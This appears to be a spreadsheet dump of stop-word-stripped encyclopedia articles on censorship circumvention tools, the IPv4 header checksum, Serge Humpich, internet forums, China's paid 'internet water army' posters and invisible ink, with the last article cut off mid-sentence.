multiple servers make source destination traffic less traceable. cases used avoid censorship, especially configured traffic obfuscation techniques. traffic obfuscation censor able detect block circumvention tools deep packet inspection. there efforts make circumvention tools less detectable randomizing traffic, attempting mimic whitelisted protocol tunneling traffic whitelisted site using techniques including domain fronting meek. circumvention tools adopted multiple obfuscation techniques users depending nature connection, sometimes called "pluggable transports." internet alternatives functionality people might overlap non-internet services, traditional post, bluetooth, walkie-talkie. following detailed examples: alternative data transport datacasting allows transmission pages information satellite broadcast channels bypassing internet entirely. this requires satellite dish suitable receiver hardware provides powerful means avoiding censorship. because system entirely receive user, suitably air-gapped computer impossible detect. sneakernets sneakernet transfer electronic information, especially computer files, physically carrying data storage media place another. sneakernet move data regardless network restrictions simply using network all. example widely adopted sneakernet network paquete semanal cuba. adoption circumvention tools circumvention tools seen spikes adoption response high-profile blocking attempts, however, studies measuring adoption circumvention tools countries persistent widespread censorship report mixed results. response persistent censorship measures estimates circumvention tool adoption reported widely divergent results. 2010 study harvard university researchers estimated users censorship circumvention tools—likely less users even countries consistently implement widespread censorship. other studies reported substantially larger estimates, disputed.in china, anecdotal reports suggest adoption circumvention tools particularly high certain communities, universities, survey freedom house found users generally find circumvention tools difficult use. market research firm globalwebindex reported million twitter users million facebook users china (both services blocked). however, estimates disputed; facebook's advertising platform estimates million users china, reports twitter adoption estimate million users. other studies pointed efforts block circumvention tools china reduced adoption tools; network previously 30,000 users connecting china 2014 approximately 3,000 chinese users.in thailand, internet censorship existed since 2002, sporadic inconsistent filtering. small-scale survey thai internet users, research group university washington found surveyed users attempted circumvention tools, successful using tools. users often made on-the-spot decisions circumvention tools based limited unreliable information, variety perceived threats, abstract others concrete based personal experiences. response blocking events response 2014 blocking twitter turkey, information alternate servers widely shared, using another server google public allowed users access twitter. block, total number posts made turkey 138%, according brandwatch, internet measurement firm.after april 2018 telegram messaging iran, searches circumvention software increased much search terms, evidence users downloading unsafe software. many third iranian internet users used psiphon tool days immediately following block, june 2018 many million iranian users continued tool. anonymity, risks, trust circumvention anonymity different. circumvention systems designed bypass blocking, usually protect identities. anonymous systems protect user's identity. contribute circumvention, primary function. important understand open public proxy sites provide anonymity view record location computers making requests well websites accessed.in many jurisdictions accessing blocked content serious crime, particularly content considered child pornography, threat national security, incitement violence. thus important understand circumvention technologies protections provide tools appropriate particular context. great care must taken install, configure, circumvention tools properly. individuals associated high-profile rights organizations, dissident, protest, reform groups take extra precautions protect online identities.circumvention sites tools provided operated trusted third parties located outside censoring jurisdiction collect identities personal information. best trusted family friends personally known circumventor, family friends available, sites tools provided individuals organizations known reputations recommendations endorsement others need used. commercial circumvention services provide anonymity surfing internet, could compelled make records users' personal information available enforcement. software there five general types internet censorship circumvention software: proxies script running server perform proxying function. proxy client sends requested embedded within data portion http request proxy server. proxy server pulls ultimate destination information data embedded http request, sends http request ultimate destination, returns result proxy client. proxy tool's security trusted operator proxy server trusted. proxy tools require manual configuration browser client software installation, require user alternative, potentially confusing browser interface within existing browser. http proxies send http requests intermediate proxying server. client connecting http proxy sends exactly http request proxy would send destination server unproxied. http proxy parses http request; sends http request ultimate destination server; returns response back proxy client. http proxy tool's security trusted operator proxy server trusted. http proxy tools require either manual configuration browser client side software configure browser user. once configured, http proxy tool allows user transparently normal browser interface. application proxies similar http proxies, support wider range online applications. peer-to-peer systems store content across range participating volunteer servers combined technical techniques re-routing reduce amount trust placed volunteer servers social networks establish trust relationships server client users. peer-to-peer system trusted operators various servers trusted extent architecture peer-to-peer system limits amount information available single server server operators trusted cooperate combine information hold. re-routing systems send requests responses series proxying servers, encrypting data proxy, given proxy knows either data came going both. this decreases amount trust required individual proxy hosts. below list different internet censorship circumvention software: also references external links casting wider net: lessons learned delivering content censored internet, ronald deibert, canada centre global security studies citizen lab, munk school global affairs, university toronto, october 2011 censorship wikia, anti-censorship site catalogs past present censored works, using verifiable sources, forum discuss organizing circumventing censorship "circumvention tool evaluation: 2011", roberts, ethan zuckerman, john palfrey, berkman centre internet society, august 2011 "circumvention tool usage report: 2010", roberts, ethan zuckerman, jillian york, robert faris, john palfrey, berkman centre internet society, october 2010 digital security privacy human rights defenders, dmitri vitaliev, published front line international foundation protection human rights defenders "digital tools curb snooping", york times, july 2013 "dns nameserver swapping", methods scripts useful evading censorship filtering bypass internet censorship, also known titles: bypassing internet censorship circumvention tools, floss manual, march 2011, translations published arabic, burmese, chinese, persian, russian, spanish, vietnamese internet censorship wiki, provides information different methods access filtering ways bypass "leaping firewall: review censorship circumvention tools" archived september 2011 wayback machine, cormac callanan (ireland), hein dries-ziekenheiner (netherlands), alberto escudero-pascual (sweden), robert guerra (canada), freedom house, april 2011 "media freedom internet cookbook" osce representative freedom media, vienna, 2004 "online survival kit", fight censorship project reporters without borders "selected papers anonymity", free haven project, accessed september 2011 "ten things look circumvention tool", roger dingledine, project, september 2010</t>
  </si>
  <si>
    <t>Internet checksum</t>
  </si>
  <si>
    <t>internet checksum, also called ipv4 header checksum checksum used version internet protocol (ipv4) detect corruption header ipv4 packets. carried packet header, represents 16-bit result summation header words.the ipv6 protocol header checksums. designers considered whole-packet link layer checksumming provided protocols, ethernet, combined checksums upper layer protocols udp, sufficient. thus, ipv6 routers relieved task recomputing checksum whenever packet changes, instance lowering limit counter every hop. internet checksum mandatory detect errors ipv6 packets (including data payload). internet checksum used detect errors icmp packets (including data payload). computation checksum calculation defined 791: checksum field 16-bit ones' complement ones' complement 16-bit words header. purposes computing checksum, value checksum field zero. corruption, result summing entire header, including checksum, zero. hop, checksum verified. packets checksum mismatch discarded. router must adjust checksum changes header (such decrementing ttl).the procedure explained detail 1071 "computing internet checksum". optimisations presented 1624 "computation internet checksum incremental update" (with errata), cover case routers need recompute header checksum packet forwarding single field changed. examples calculating ipv4 header checksum take following truncated excerpt ipv4 packet. header shown bold checksum underlined. 4500 0073 0000 4000 4011 b861 c0a8 0001 c0a8 00c7 0035 e97c 005f 279f 1e4b 8180 ones' complement addition, time carry occurs, must sum. carry check correction performed addition post-process additions. another carry generated correction, another added sum. calculate checksum, first calculate value within header, skipping checksum field itself. note values hexadecimal notation.4500 0073 0000 4000 4011 c0a8 0001 c0a8 00c7 2479c first digit carry count added sum:2 479c 479e another carry generated addition, another must added sum) obtain checksum take ones' complement result: b861 shown underlined original packet header). verifying ipv4 header checksum when verifying checksum, procedure used above, except original header checksum omitted.4500 0073 0000 4000 4011 b861 c0a8 0001 c0a8 00c7 2fffd carry bits:fffd ffff taking ones' complement (flipping every bit) yields 0000, indicates error detected. header checksum check correct order values within header. also header check sequence references external links header checksum</t>
  </si>
  <si>
    <t>Serge Humpich</t>
  </si>
  <si>
    <t>serge humpich person discovered serious flaw carte bleue system used france credit cards. tried contact banks without success warning them, decided perform public "show" bought subway tickets using flaw card system. convicted 2000 months suspended sentence. time, lost result case. references ingrand, cedric (2000-02-26), "french credit card hacker convicted", register. https://www.theregister.co.uk/2000/02/26/french_credit_card_hacker_convicted/ jessel, stephen (2000-02-25), "credit card whistleblower sentenced", bbc. http://news.bbc.co.uk/2/hi/europe/657135.stm webster, paul (2000-01-22), "banks fail give credit fake smart card 'genius'",the guardian. http://www.guardian.co.uk/world/2000/jan/22/paulwebster other sites pele, laurent "french banking smartcard cracked story!", http://www.parodie.com/english/smartcard.htm time line events, links many articles) brontosaurus (2003-09-25), "serge humpich", http://www.everything2.com/title/serge+humpich everything2 article serge humpich)</t>
  </si>
  <si>
    <t>Internet forum</t>
  </si>
  <si>
    <t>internet forum, message board, online discussion site people hold conversations form posted messages. they differ chat rooms messages often longer line text, least temporarily archived. also, depending access level user forum set-up, posted message might need approved moderator becomes publicly visible. forums specific jargon associated them; example: single conversation called "thread", topic. discussion forum hierarchical tree-like structure: forum contain number subforums, several topics. within forum's topic, discussion started called thread replied many people wish. depending forum's settings, users anonymous register forum subsequently post messages. forums, users read existing messages. history modern forum originated bulletin boards, so-called computer conferencing systems, technological evolution dialup bulletin board system. from technological standpoint, forums boards applications managing user-generated content.early internet forums could described version electronic mailing list newsgroup (such exist usenet); allowing people post messages comment messages. later developments emulated different newsgroups individual lists, providing forum, dedicated particular topic.internet forums prevalent several developed countries. japan posts million largest forum, 2channel. china also many millions posts forums tianya club. some first forum systems planet-forum system, developed beginning 1970s, eies system, first operational 1976, system, first operational 1977. first forum sites (which still active today) delphi forums, called delphi. service, four million members, dates 1983. forums perform function similar dial-up bulletin board systems usenet networks first created starting late 1970s. early web-based forums date back 1994, project consortium starting time, many alternatives created. sense virtual community often develops around forums regular users. technology, video games, sports, music, fashion, religion, politics popular areas forum themes, forums huge number topics. internet slang image macros popular across internet abundant widely used internet forums. forum software packages widely available internet written variety programming languages, php, perl, java asp. configuration records posts stored text files database. each package offers different features, basic, providing text-only postings, advanced packages, offering multimedia support formatting code (usually known bbcode). many packages integrated easily existing website allow visitors post comments articles. several applications, blog software, also incorporate forum features. wordpress comments bottom blog post allow single-threaded discussion given blog post. slashcode, hand, complicated, allowing fully threaded discussions incorporating robust moderation meta-moderation system well many profile features available forum users. some stand alone threads forums reached fame notability lonely anyone speak thread moviecodec.com's forums, described "web's hangout lonely folk" wired magazine. structure forum consists tree-like directory structure. "categories". forum divided categories relevant discussions. under categories sub-forums sub-forums sub-forums. topics (commonly called threads) come lowest level sub-forums places members start discussions posts. logically forums organized finite generic topics (usually main topic) driven updated group known members, governed group known moderators. also graph structure. message boards three possible display formats. each three basic message board display formats: non-threaded/semi-threaded/fully threaded, advantages disadvantages. messages related another all, non-threaded format best. user message topic multiple replies message topic, semi-threaded format best. user message topic replies message topic responds replies, fully threaded format best. user groups internally, western-style forums organize visitors logged members user groups. privileges rights given based groups. user forum automatically promoted privileged user group based criteria administrator. person viewing closed thread member saying right submit messages there, moderator likely granting access posting messages.an unregistered user site commonly known guest visitor. guests typically granted access functions require database alterations breach privacy. guest usually view contents forum features read marking, occasionally administrator disallow visitors read forum incentive become registered member. person frequent visitor forum, section even thread referred lurker habit referred lurking. registered members often refer lurking particular location, intention participating section enjoy reading contributions moderators moderators (short singular form: "mod") users employees) forum granted access posts threads members purpose moderating discussion (similar arbitration) also keeping forum clean (neutralizing spam spambots etc.). moderators also answer users' concerns forum, general questions, well respond specific complaints. common privileges moderators include: deleting, merging, moving, splitting posts threads, locking, renaming, stickying threads, banning, unbanning, suspending, unsuspending, warning members, adding, editing, removing polls threads. "junior modding", "backseat modding", "forum copping" refer negatively behavior ordinary users take moderator-like tone criticizing members. essentially, duty moderator manage day-to-day affairs forum board applies stream user contributions interactions. relative effectiveness user management directly impacts quality forum general, appeal, usefulness community interrelated users. moderators unpaid volunteers many websites, sparked controversies community tensions. reddit, moderators prominently expressed dissatisfaction unpaid labor underappreciated, site users accused moderators abusing special access privileges "cabal" "petty tyrants". 4chan, moderators subject notable levels mockery contempt. there, often referred janitors (or, pejoratively, "jannies") given tantamount cleaning imageboards' infamous shitposting. administrators administrators (short form: "admin") manage technical details required running site. such, promote (and demote) members to/from moderators, manage rules, create sections sub-sections, well perform database operations (database backup, etc.). administrators often also moderators. administrators also make forum-wide announcements, change appearance (known skin) forum. there also many forums administrators share knowledge. post post user-submitted message enclosed block containing user's details date time submitted. members usually allowed edit delete posts. posts contained threads, appear blocks another. first post starts thread; called (thread starter) (original post). posts follow thread meant continue discussion post, respond replies; uncommon discussions derailed. western forums, classic show member's details (such name avatar) left side post, narrow column fixed width, post controls located right, bottom main body, signature block. recent forum software implementations, asian style displaying members' details post copied. posts internal limit usually measured characters. often required message minimum length characters. there always upper limit rarely reached boards either 10,000, 20,000, 30,000, 50,000 characters. most forums keep track user's postcount. postcount measurement many posts certain user made. users higher postcounts often considered reputable users lower postcounts, always. instance, forums disabled postcounts hopes emphasize quality information quantity. thread thread (sometimes called topic) collection posts, usually displayed oldest latest, although typically configurable: options newest oldest threaded view tree-like view applying logical reply structure chronological order) available. thread defined title, additional description summarize intended discussion, opening original post (common abbreviation also used refer original poster), opens whatever dialogue makes whatever announcement poster wished. thread contain number posts, including multiple posts members, even other. bumping thread contained forum associated date taken date last post (options order threads criteria generally available). when member posts thread jump since latest updated thread. similarly, threads jump front receive posts. when member posts thread reason top, referred bump bumping. suggested "bump" acronym "bring post"; however, almost certainly backronym usage entirely consistent verb "bump" means knock position".on messageboards, users choose sage (correctly pronounced /sa-ɣe/ though often confused ipa: [seɪdʒ]) post wish make post, "bump" word "sage" derives 2channel terminology sageru, meaning lower". stickying threads important rarely receive posts stickyed (or, software, "pinned"). sticky thread always appear front normal threads, often section. "threaded discussion group" simply group individuals forum threaded, asynchronous, discussion purposes. group users forum. thread's popularity measured forums reply (total posts minus one, opening post, default forum settings) counts. some forums also track page views. threads meeting number posts number views receive designation "hot thread" displayed different icon compared threads. this icon stand emphasize thread. forum's users lost interest particular thread, becomes dead thread. discussion forums prefer premise open free discussion often adopt facto standards. most common topics forums include questions, comparisons, polls opinion, well debates. uncommon nonsense unsocial behavior sprout people lose temper, especially topic controversial. poor understanding differences values participants common problem forums. because replies topic often worded aimed someone's point view, discussion usually slightly several directions people question other's validity, sources circular discussion ambiguity replies extend several tens posts thread eventually ending everyone gives attention spans waver interesting subject takes over. uncommon debate hominem attacks. liabilities owners moderators several lawsuits brought forums moderators claiming libel damage. recent case scubaboard lawsuit business maldives filed suit scubaboard libel defamation january 2010. part, though, forum owners moderators united states protected section communications decency act, states "[n]o provider user interactive computer service shall treated publisher speaker information provided another information content provider." 2019, facebook faced class action lawsuit forth moderators diagnosed post-traumatic stress disorder. settled million following year. common features default internet forum, application needs ability submit threads replies. typically, threads newer older view, replies older newer view. tripcodes capcodes most imageboards 2channel-style discussion boards allow (and encourage) anonymous posting system tripcodes instead registration. tripcode hashed result password allows one's identity recognized without storing data users. tripcode system, secret password added user's name following separator character (often number sign). this password, tripcode, hashed special key, trip, distinguishable name html styles. tripcodes cannot faked types forum software insecure guessed. types, brute forced software designed search tripcodes tripcode explorer.moderators administrators frequently assign capcodes, tripcodes guessable trip replaced special notice (such administrator"), cap. private message private message, short, message sent private member members. ability send so-called blind carbon copies sometimes available. when sending blind carbon copy (bcc), users message sent directly aware recipients blind carbon copy even sent first place.private messages generally used personal conversations. they also used tripcodes—a message addressed public trip picked typing tripcode. attachment attachment almost file. when someone attaches file person's post uploading particular file forum's server. forums usually strict limit attached cannot (among size files question). attachments part thread, social group, etc., bbcode html hypertext markup language (html) sometimes allowed usually discouraged allowed, extensively filtered. modern bulletin board systems often disabled altogether allow administrators allowing normal user level considered security risk high rate vulnerabilities. when html disabled bulletin board code (bbcode) common preferred alternative. bbcode usually consists tag, similar html instead tagname enclosed within square brackets (meaning: commonly used italic type, used bold, underline, [color="value"] color [list] lists, well [img] images [url] links. following example bbcode: [b]this[/b] [i]clever[/i] [i]text[/i] [/b] post viewed code rendered html appear this clever text. many forum packages offer create custom bbcodes, bbcodes built package, administrator board create complex bbcodes allow javascript iframe functions posts, example embedding youtube google video complete viewer directly post. emoticon emoticon smiley symbol combination symbols used convey emotional content written message form. forums implement system text representations emoticons (e.g. rendered small image. depending part world forum's topic originates (since forums international) smilies replaced forms similar graphics, example would kaoani (e.g. *(^o^)*, (^-^)b), even text special symbols (e.g. :blink:, :idea:). poll most forums implement opinion poll system threads. most implementations allow single-choice multi-choice (sometimes limited certain number) selecting options well private public display voters. polls expire certain date cases number days creation. members vote poll statistic displayed graphically. atom atom feeds allow minimalistic means subscribing forum. common implementations allow feeds list last threads updated forum index last posts thread. other features ignore list allows members hide posts members want problem with. implementations, referred list ignore list. posts usually hidden, minimized small indicating post user ignore list there. almost internet forums include member list, allows display forum members, integrated search feature. some forums list members posts, even activated accounts. many forums allow users give avatar. avatar image appears beside user's posts, order make user recognizable. user upload image forum database provide link image separate website. each forum limits height, width, data size avatars used; user tries avatar big, scaled rejected. similarly, forums allow users define signature (sometimes called sig), block text, possibly bbcode, appears bottom user's posts. there character limit signatures, though high rarely hit. often forum's moderators impose manual rules signatures prevent obnoxious (for example, extremely long flashing images), issue warnings bans users break rules. like avatars, signatures improve recognizability poster. they also allow user attach information posts, proclaiming support cause, noting facts themselves, quoting humorous things previously said forum. common forums, subscription form automated notification integrated software forums. usually notifies either email site member returns. option subscribe available every thread logged subscriptions work read marking, namely property unread, given content never served user software. recent development popular implementations forum software brought social network features functionality. such features include personal galleries, pages well social network like chat systems. most forum software fully customizable "hacks" "modifications" readily available customize person's forum members' needs. often forums "cookies", information user's behavior site sent user's browser used upon re-entry site. this done facilitate automatic login show user whether thread forum received posts since last visit. these disabled cleared time. rules policies forums governed individuals, collectively referred staff, made administrators moderators, responsible forums' conception, technical maintenance, policies (creation enforcing). most forums list rules detailing wishes, aim, guidelines forums' creators. there usually also section containing basic information members people familiar principles forum (generally tailored specific forum software). rules forums usually apply entire user body often preset exceptions, commonly designating section exception. example, forum discussion regarding anything computer programming languages rules, exception general chat section. forum rules maintained enforced moderation team, users allowed help known report system. most western forum platforms automatically provide system. consists small function applicable post (including one's own). using notify currently available moderators location, subsequent action judgment carried immediately, particularly desirable large developed boards. generally, moderators encourage members also private message system wish report behavior. moderators generally frown upon attempts moderation non-moderators, especially would-be moderators even issue report. messages non-moderators acting moderators generally declare post rules predict punishment. while harmful, statements attempt enforce rules discouraged.when rules broken several steps commonly taken. first, warning usually given; commonly form private message recent development made possible integrated software. subsequent this, ignored warnings work, member usually first exiled forum number days. denying someone access site called ban. bans mean person longer even view site anymore. offender, warning sentence, repeats offense, another given, usually time longer one. continuous harassment site eventually leads permanent ban. cases, means simply account locked. extreme cases offender permanently banned creates another account continues harass site, administrators apply address block (this also applied server level): address static, machine offender prevented accessing site. extreme circumstances, address range bans country bans applied; usually political, licensing, reasons. also: block (internet), address blocking, internet censorship. offending content usually deleted. sometimes topic considered source problem, locked; often poster request topic expected draw problems locked well, although moderators decide whether grant locked thread, members cannot post anymore. cases topic considered breach rules posts deleted. troll forum trolls users repeatedly deliberately breach netiquette established online community, posting inflammatory, extraneous, off-topic messages bait excite users responding test forum rules policies, patience forum staff. their provocative behavior potentially start flame wars (see below) disturbances. responding troll's provocations commonly known 'feeding troll' generally discouraged, encourage disruptive behavior. sock puppet term sock puppet refers multiple pseudonyms person particular message board forum. analogy sock puppet puppeteer holding hands supplying dialogue puppets simultaneously. typical sockpuppet account agree debate another sockpuppet account belonging person, purposes reinforcing puppeteer's position argument. sock puppets usually found address check done accounts forums. spamming forum spamming breach netiquette users repeat word phrase over, differs multiple posting spamming usually willful sometimes malicious intent. this common trolling technique. also traditional spam, unpaid advertisements breach forum's rules. spammers utilize number illicit techniques post spam, including botnets. some forums consider concise, comment-oriented posts spam, example thank you, cool love double posting common faux internet forums post message twice. users sometimes post versions message slightly different, especially forums allowed edit earlier posts. multiple posting instead editing prior posts artificially inflate user's post count. multiple posting unintentional; user's browser might display error message even though post transmitted user slow forum might become impatient repeatedly submit button. offline editor post message twice. multiple posting also used method trolling spreading forum spam. user also send post several forums, termed crossposting. term derives usenet, crossposting accepted practice causes problems forums, lack ability link posts replies forum visible people reading post forums. necroposting necropost message revives necromancy) arbitrarily thread, causing appear newer active threads. this practice generally seen breach netiquette forums. because threads usually locked posting, necroposting common newer users cases date previous posts apparent. word censor word censoring system commonly included forum software package. system pick words body post user-editable forum element (like user titles), partially match certain keyword (commonly case sensitivity) censored. common censoring letter replacement asterisk character. example, user title, deemed inappropriate users words "admin", "moderator", "leader" censoring system implemented, title "forum leader" filtered "forum ******". rude vulgar words common targets censoring system. auto-censors make mistakes, example censoring "wristwatch" "wris****ch" "scunthorpe" "s****horpe." flame wars when thread—or cases, entire forum—becomes unstable, result usually uncontrolled spam form one-line complaints, image macros, abuse report system. when discussion becomes heated sides nothing complain accept other's differences point view, discussion degenerates called flame war. flame someone means off-topic attack person rather opinion. likely candidates flame wars usually religion socio-political topics, topics discuss pre-existing rivalries outside forum (e.g., rivalry games, console systems, manufacturers, nationalities, etc.). when topic degenerated flame considered akin forum section entire board), spam flames chance spreading outside topic causing trouble, usually form vandalism. some forums (commonly game forums) suffered forum-wide flame wars almost immediately conception, pre-existing flame element online community. many forums created devoted areas strictly discussion potential flame topics moderated like normal. registration anonymity many internet forums require registration post. registered users site referred members allowed submit send electronic messages application. process registration involves verification one's (typically required meet coppa requirements american forum software) followed declaration terms service (other documents also present) request agreement said terms. subsequently, goes well, candidate presented form fill requesting least username alias), password, email validation captcha code. while simply completing registration form general enough generate account, status label inactive commonly provided default registered user confirms email address given registering indeed belongs user. until time, registered user account post, reply, send private messages forum. sometimes referrer system implemented. referrer someone introduced otherwise "helped someone" decision join site (likewise, http referrer site linked another site). usually, referrers forum members members usually rewarded referrals. referrer system also sometimes implemented that, visitor visits forum link referrerid=300, user number example, 300) would receive referral credit visitor registers. purpose commonly give credit (sometimes rewards implied) help community grow. areas japan, registration frequently optional anonymity sometimes even encouraged. forums, tripcode system used allow verification identity without need formal registration. people regularly read forum discussions register post often referred "lurkers". comparison applications electronic mailing lists: main difference forums electronic mailing lists mailing lists automatically deliver messages subscriber, forums require reader visit website check posts. because members miss replies threads interested many modern forums offer "e-mail notification" feature, whereby members choose notified posts thread, feeds allow members summary posts using aggregator software. there also software products combine forum mailing list features, i.e. posting reading email well browser depending member's choice.newsreader: main difference newsgroups forums additional software, news client, required participate newsgroups whereas using forum requires additional software beyond browser. shoutboxes: unlike internet forums, shoutboxes require registration, requiring email address user. additionally, shoutboxes heavily moderated, unlike message boards. wiki: unlike conventional forums, original wikis allowed users edit content (including other's messages). this level content manipulation reserved moderators administrators forums. wikis also allow creation content outside talk pages. hand, weblogs generic content management systems tend locked point select users post blog entries, although many allow users comment upon them. wiki hosting site known wikia features operation, known forum message wall. forum used solely discussion works editing, message wall works posted messages similar traditional forum. chat rooms instant messaging: forums differ chats instant messaging forum participants online simultaneously receive send messages. messages posted forum publicly available time even forum thread closed, uncommon chat rooms maintain frequent activity. rarity among forums ability create picture album. forum participants upload personal pictures onto site descriptions pictures. pictures format posting threads, contain options "report post" "reply post". also notes examples references also thread process schedulingresourcesphpbb (open-source code copyrighted platform) open directory project (multi-platform ontology-based open-standard content directory active directory (microsoft-proprietary single sign-on, access, remote domain control service) external links archived copy forum software reviews timeline delphi forums people like internet forums</t>
  </si>
  <si>
    <t>Internet water army</t>
  </si>
  <si>
    <t>internet water army (simplified chinese: 网络水军; traditional chinese: 網絡水軍; pinyin: wǎngluò shuǐjūn) group users paid post online comments vested interest chinese language websites. internet water armies started early 2010s. they post news, comments, gossip disinformation online platforms like weibo, wechat taobao, china's ebay-like platform. astroturfing technique public relations media manipulation, online chinese companies employ people post social media change public opinion. developed industry company specializing internet water armies earn million yuan within three months made 2500 transactions. private internet water army operations parallel official cent party internet commentators hired government people's republic china chinese communist party (ccp) spread propaganda. prominent group bar. background governmental programs social media manipulation found worldwide. china's cent party (named yuan payment posting) trains employs tens thousands online commentators promote party line control public opinion microblogs, bulletin board systems, chatrooms. name water army metaphor refers "the large number people well organized flood internet purposeful comments articles". chinese etymology shuijun meaning "navy" instead "water army" translated shuijunshiwan 水军十万 (lit. "navy 100,000") company slogan: "thousands navy, assignment".adam clark estes describes name term 'internet troll' conjures unintimidating images angry, acne-faced computer geeks, phrase 'internet water army' sounds horrifying, like force besuited villains graphic novel. reality, scary, continually booming business paid spammers mission-driven trolls definitely unsettling."xinhua news agency reported name: "zombies" (jiangshi transl. "zombie"), paid followers sina weibo microblogs, "can bought sold online little yuan cents) thousand". features paid posting involves thousands individuals posters using different online ids. every day, around percent trending hashtags social media platform created internet water armies. content usually well-prepared quality control team check whether postings meet customer's standards. some companies hire internet water armies leave good reviews, singers film stars also fake followers sina weibo. price posting good comments comments depends content. negative reviews product gossip targeting person, must internet water army screen delete negative comments.there difference internet water army cent party. concept cent party narrower since refers paid posters deflect political discussions post positive supporting reviews related central government ccp. according harvard university study 2017, estimated million social media comments fabricated cent party hired chinese government time. these comments avoid touching upon controversial sensitive issues. types there limitation joining internet water army. low-end migrants, housewives students main force.there three types internet water armies. first type voluntarily spreads posts promoting social justice, second mainly hired government state-owned companies promote propaganda, third works private companies, public relations companies, pursue interests. tactics 2010 news story china central television listed three customer services internet water armies: promotion specific product, company, person message; slandering adversary products services, helping delete negative unfavorable posts news articles.pricing internet water armies tactics varies. shanghai daily quoted tang jing, employee company shuijunshiwang.com, prices range "basic zombie" less yuan ($0.79) 1,000 internet marketplace taobao "a-level zombie" "the characteristics real person, photo, self-description, tags categories fans" yuan ($18.86) 5,000.cheng chen, computer science researcher university victoria, three colleagues performed academic study internet water army activities. learn online chinese ghostwriters operate, cheng registered undercover internet company trained paid make social media postings. each mission project manager; trainer team plans schedules, distributes shared user ids, maintains quality control; posters team, typically college students unemployed people, gets cents validated post; resources team registers collects online user ids; team maintains relationships social media webmasters. reasons online marketing china become profitable business spawned many internet public relations agencies. internet water armies working firms advertise products also remove negative feedback find.many celebrity agencies entertainment industry die-hard fans willing spend money hire internet water armies generate positive online reviews songs movies. armies range handful people hundreds, often help celebrities inflate social media accounts' followers thousands fake followers. addition, entertainment companies internet water armies bump film ratings smear rival's reputation.many people join internet water army think online paid posting type online part-time opportunity easy make money. with ubiquity personal computers smart phones along easy-to-use microblogging platforms, entry barrier low. income internet water armies primary reason many people choose join them, internet water army members earn thousand yuan month posting deleting reviews. current affairs 2017, chinese internet regulators imposed strict bans hiring paid posters part sweeping campaign tighten internet control. police arrested people water army cases closed 5,000 paid poster accounts since 2017. june, sentenced five years nine months prison fined 920,000 yuan ($135,000) generating fake transactions product reviews taobao; first judicial case suspect charged offense china.in july 2018, producer asura said movie's ratings brought fake comments influential rating platform.in august 2018, guangzhou's latest move targeting internet water army larger scale crackdown launched china's public security authority, involving suspects million yuan ($635,000). legality marketing companies like internet water armies sometimes operate murky legal grounds, particularly international law. companies facebook digg sent cease desist orders australian company usocial, ignored continues market "friends" "votes".china, unlike many countries, strict cyber defamation law, internet water army companies accused violating it.internet water army practices often result privacy violations damaged reputations, 2009 revision china's tort liability stipulated cases, "the victim right inform internet service provider (isp) delete harmful postings must face joint liability damages fails act". china's state council information office announced 2011 working laws regulate increasing numbers "internet army." wang chen, director office, announced chinese government paid constant attention posters commentators, found damaging social order real virtual world."in 2007, cosmetics firm doctor health-food company biostime sued consumer protection website 315ts.net posting fake comments products. "judges eventually ruled website's favor evidence suggest posts genuine." according 2010 china daily report, mengniu dairy denied paying wangluo zhujun company spread false rumors dairy products competitors yili group synbutra international. shanghai daily reported 2011 online shopping website taobao shut internet water army companies selling microblog followers. detection internet water armies threat cyber security.some scholars adopted dirichlet process mixture model (dpmm)-based algorithm detect internet water armies tianya forum. they used dpmm effectively analyze internet water army user behavior sequential pattern mining algorithms determine paid posters' accounts.an information technology engineer, blogging chen chuanliang peter, claimed developed software differentiated paid blog "followers", found percent followers sina's popular microblogs "never interacted responded following. words, zombies."cheng chen chose detection case study online comments tencent conflict major chinese companies, suspected paying posts. 2010, qihoo, creator safeguard, claimed tencent's instant message client tencent secretly scanned users' hard drives. after tencent blocked safeguard users using messenger app, controversy erupted social media websites. cheng's researchers analyzed large datasets tencent postings, 1000 comments users sohu.com 20,000 comments users sina.com. they concluded: "although tencent claimed hire online paid posters, strong evidence suggesting opposite. some special patterns definitely unusual, e.g., many negative comments replies came newly registered user user seldom used afterwards. this clearly indicates online paid posters." researchers designed validated detection software, concluded "test results real-world datasets show[ed] promising performance". also trolls olgino brigades public opinion brigades state-sponsored internet sockpuppetry little pink references external links china's cybersecurity law: what need know, diplomat undercover researchers expose chinese internet water army, technology review</t>
  </si>
  <si>
    <t>Invisible ink</t>
  </si>
  <si>
    <t>invisible ink, also known security sympathetic ink, substance used writing, invisible either application soon thereafter, later made visible means, heat ultraviolet light. invisible form steganography. history earliest writers mention invisible aeneas tacticus, century mentions discussing survive siege indicate type used. this part list different methods secret communications book called defense fortifications. techniques involved steganography involved puncturing tiny hole letters document spell secret message. this include invisible germans improved method world world they used invisible microdots instead pinpricks.philo byzantium first writer known describe invisible using reagent around 217–218 galls vitriol. these ingredients used make gall ink. people soon discovered could write invisibly ingredients cause writing appear adding other.pliny elder roman poet ovid gave advice plant juices milk write secret messages. lemons also used organic inks arabs around 16th century europe.giovanni battista della porta credited first recipe sympathetic ink, derived alum vinegar, well first book secret writing invisible inks, magia naturalis(1558, 1589).: since then, wide variety invisible inks used sorts secretive purposes. formula similar gall created james used george washington culper ring american revolution lemon juice used 'lemon juice spies' (carl muller germans, died efforts either suicide execution, along john hahn, english baker) world world neutral acidic solutions phenolphthalein, chemical compound extracted pills constipation, used invisible ink. colorless turns pink exposed alkali ammonia bicarbonate soda. general application invisible applied writing surface specialty purpose stylus, stamp, fountain pen, toothpick, calligraphy pen, cotton swab, even finger dipped liquid. once dry, written surface looks blank, similar texture reflectivity surrounding surface. later made visible different methods according type invisible used. revealed heat application appropriate chemical, made visible viewing ultraviolet light. inks developed chemical reaction depend acid-base reaction (like litmus paper), reactions similar blueprint process, hundreds others. developer fluids applied using spray bottle, developers form vapor, e.g. ammonia fumes used develop phenolphthalein ink. there also invisible pens tips—one invisible writing, another developing ink. invisible sometimes used print parts pictures text books children play with, always including "decoder pen" used show invisible parts texts pictures, thus revealing answers questions printed regular completing missing parts pictures. security marker pens markers fluorescent glows illuminated light often used invisibly mark valuable household items case burglary. there specialty security maker pens formulated writing non-porous surfaces glass, plastic, metal, etc. mark read using blacklight light source. security marker pens obtained commercially widely used crime countermeasure. some commercially available invisible inks glow brightly, variety colors, ultraviolet light. this makes suitable readmission hand stamping. there invisible types invisible applied certain types surfaces, still visible others. some vendors offer invisible computer inkjet printers. such inks usually visible ultraviolet light. typical uses include printing information business forms form processor, without cluttering visible contents form. example, united states postal service mail sorting stations uv-visible print codes mailed envelopes giving routing information mail handling equipment line delivery. very rarely, invisible used art. usually developed, though always. there artists effect conjunction 